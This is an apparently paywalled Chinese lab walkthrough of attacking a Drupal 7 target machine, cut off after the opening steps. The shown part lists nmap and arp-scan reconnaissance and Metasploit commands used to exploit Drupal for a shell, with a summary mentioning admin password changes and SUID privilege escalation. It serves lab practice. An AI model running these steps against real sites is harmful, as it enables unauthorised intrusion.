目录
一. 环境
靶机:192.168.1.184
攻击机kali:192.168.1.98
(l网络配置都是NAT模式)
----开始---渗透
二. 信息收集
1. 主机发现
1. nmap -sP 192.168.1.0/24 或 arp-scan -l #识别目标主机
2. nmap -sn 192.168.1.0/24 或者 nmap -sP 192.168.1.0/24 #主机发现/主机探测
3. nmap -sS -A -p- 192.168.1.184 #识别目标主机服务,端口
-A 全面系统检测、启用脚本检测、扫描等
-sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限
发现了靶机IP 192.168.1.184 及 80端口开放


2.访问 192.168.1.184:80
发现网站是Drupal(CMS+PHP)搭建的,使用的是Drupal 7版本

三. 利用msfconsole 攻击(拿到flag1)
1. 漏洞利用成功

1. search drupal #查找drupal的漏洞
2. use 2 #利用第2个龙洞
3. show options #显示详情
4. set rhosts 192.168.1.184 # 设置靶机地址
5. run 或 exploit # 开始攻击
攻击成功后
6. pwd # 查看当前路径
渗透攻击实战:Drupal7漏洞利用与权限提升

本文记录了一次渗透攻击过程,从环境侦查、信息收集到利用Drupal7漏洞获取shell,修改管理员密码,最终通过SUID提权获取flag。涉及的技术包括nmap扫描、MSFconsole工具、Drupal漏洞利用、MySQL操作及权限管理。
最低0.47元/天 解锁文章
1559





